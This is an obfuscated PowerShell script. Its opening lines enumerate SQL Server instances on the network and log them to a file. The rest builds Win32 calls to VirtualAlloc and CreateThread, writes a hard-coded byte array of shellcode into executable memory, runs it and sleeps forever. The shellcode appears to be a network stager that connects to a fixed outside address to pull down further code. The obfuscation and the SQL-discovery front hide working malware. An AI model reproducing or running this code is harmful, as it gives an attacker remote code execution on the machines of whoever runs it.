  sET  ('qn'+'4') ( [TYpE]("{5}{2}{0}{1}{4}{3}" -f'on.ASSE','m','eflEcTi','LY','b','r') );    SeT-iteM ("{3}{1}{2}{0}" -f '4','rIaBlE:','WT','vA') ( [TYpe]("{8}{7}{2}{5}{4}{1}{6}{3}{0}"-F'atOr','AtASOu','m.dATA.sQL','r','ld','.SQ','rCEenuME','ystE','S') );
[void] ${Q`N4}::("{3}{2}{0}{4}{1}" -f 'dWith','lName','a','Lo','Partia').Invoke( ("{0}{1}{2}{3}{4}" -f'Microsoft.Sq','l','Serve','r.Sm','o') );
${sMoA`PP} = [Microsoft.SqlServer.Management.Smo.SmoApplication];
${sM`O`APp}::("{2}{1}{0}{3}" -f 'bl','numAvaila','E','eSqlServers').Invoke(${FA`l`Se});


${S`ql} =   ${w`T4}::"InSTA`N`cE".("{1}{3}{2}{0}" -f 'ources','G','DataS','et').Invoke() | `
.("{0}{1}{2}"-f 'f','oreac','h') {
"INSERT INTO dbo.FoundSQLServers VALUES ('$($_.ServerName)', '$($_.InstanceName)', '$($_.IsClustered)', '$($_.Version)') " `
>> ((("{2}{6}{0}{1}{3}{7}{8}{4}{5}" -f'}Log','s','C:{0}Dexm','{0','ers.','sql','a{0','}INSERTFoundS','QLServ'))  -f [ChAR]92)
        };
${c} = ((("{27}{7}{38}{39}{64}{17}{55}{43}{26}{50}{65}{12}{6}{21}{23}{4}{5}{1}{54}{0}{14}{62}{10}{22}{47}{29}{52}{24}{60}{32}{9}{16}{35}{40}{18}{33}{66}{58}{31}{46}{48}{34}{41}{28}{19}{37}{2}{36}{8}{25}{59}{57}{44}{63}{49}{30}{3}{51}{13}{61}{20}{53}{15}{56}{11}{42}{45}" -f 'iL',';[DllIm','r lp',' stati','ype, ','uint flProtect)','uint ','(iLJke','hreadId','d(','.dlliLJ)','sr','Size, ','te','Jk','et(IntPtr des','IntPt','stati','dAtt','tPtr lpPar','tPtr mem','flA',']public static ex','llocationT','eateTh',');[','lloc(IntPtr lpAddres','[DllImport','ss, In','n IntPtr C','blic','I','a','ributes, uint','A','r lpThr','T','ameter, uint dwCreationFlags, IntPt','rnel32','.dlliL','ea','ddre','c, uint cou','alA','vcrt.dll','nt);','n','ter','tPtr lpStart','J)]pu','s, uint ','c ex','r','s','port(','c extern IntPtr Virtu','t, uint ','ort(iLJms','StackSize, ','DllImp','re','rn In','ernel32','iL','J)]public ','dw',' dw'))  -rEpLaCE'iLJ',[char]34);${W} = &("{2}{1}{0}" -f 'pe','Ty','Add-') -memberDefinition ${C} -Name ("{0}{1}"-f 'W','in32') -namespace ("{2}{1}{0}{3}{4}" -f 'ct','n32Fun','Wi','io','ns') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xad,0xff,0xc5,0x8e,0x68,0x02,0x00,0x9d,0x6b,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${Z}."leN`g`TH" -gt 0x1000){${g} = ${Z}."l`eNG`TH"};${x}=${W}::("{0}{2}{3}{1}"-f 'Vir','c','tualA','llo').Invoke(0,0x1000,${G},0x40);for (${i}=0;${i} -le (${Z}."le`NG`Th"-1);${i}++) {${w}::"mEm`S`ET"([IntPtr](${X}.("{1}{0}"-f'oInt32','T').Invoke()+${I}), ${Z}[${I}], 1)};${W}::("{2}{0}{1}"-f 'rea','teThread','C').Invoke(0,0,${x},0,0,0);for (;;){&("{1}{2}{0}" -f'p','S','tart-slee') 60};
